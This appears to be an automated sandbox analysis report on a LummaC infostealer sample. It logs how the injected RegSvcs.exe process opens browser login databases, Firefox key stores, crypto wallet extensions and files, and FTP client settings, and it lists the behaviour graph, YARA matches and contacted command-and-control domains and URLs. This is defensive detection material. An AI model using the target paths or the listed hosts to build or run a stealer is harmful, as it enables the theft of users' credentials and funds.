Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\ZIPXYXWIOY Jump to behavior

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Installer.exe.35f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.Installer.exe.35f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560657 Sample: file.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 36 processhol.sbs 2->36 38 librari-night.sbs 2->38 40 joxi.net 2->40 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Antivirus detection for URL or domain 2->58 60 6 other signatures 2->60 9 file.exe 8 2->9         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 9->32 dropped 34 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 9->34 dropped 62 Contains functionality to register a low level keyboard hook 9->62 13 cmd.exe 2 9->13         started        signatures6 process7 process8 15 Installer.exe 13 13->15         started        19 7z.exe 2 13->19         started        22 7z.exe 3 13->22         started        24 6 other processes 13->24 dnsIp9 44 joxi.net 176.9.162.205, 49706, 80 HETZNER-ASDE Germany 15->44 46 Writes to foreign memory regions 15->46 48 Allocates memory in foreign processes 15->48 50 Injects a PE file into a foreign processes 15->50 52 2 other signatures 15->52 26 RegSvcs.exe 15->26         started        30 C:\Users\user\AppData\Local\...\Installer.exe, PE32 19->30 dropped file10 signatures11 process12 dnsIp13 42 librari-night.sbs 172.67.206.172, 443, 49707, 49708 CLOUDFLARENETUS United States 26->42 64 Tries to harvest and steal ftp login credentials 26->64 66 Tries to harvest and steal browser information (history, passwords, etc) 26->66 68 Tries to steal Crypto Currency Wallets 26->68 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.206.172
 librari-night.sbs United States
13335 CLOUDFLARENETUS false
176.9.162.205
 joxi.net Germany
24940 HETZNER-ASDE false

Contacted Domains

Name IP Active
joxi.net 176.9.162.205 true
librari-night.sbs 172.67.206.172 true
processhol.sbs unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://librari-night.sbs/api false
    		high
    p3ar11fter.sbs false
      		high
      http://joxi.net/4Ak49WQH0GE3Nr.mp3 false
        		high
        peepburry828.sbs false
          		high
          p10tgrace.sbs false
            		high
            processhol.sbs false
              		high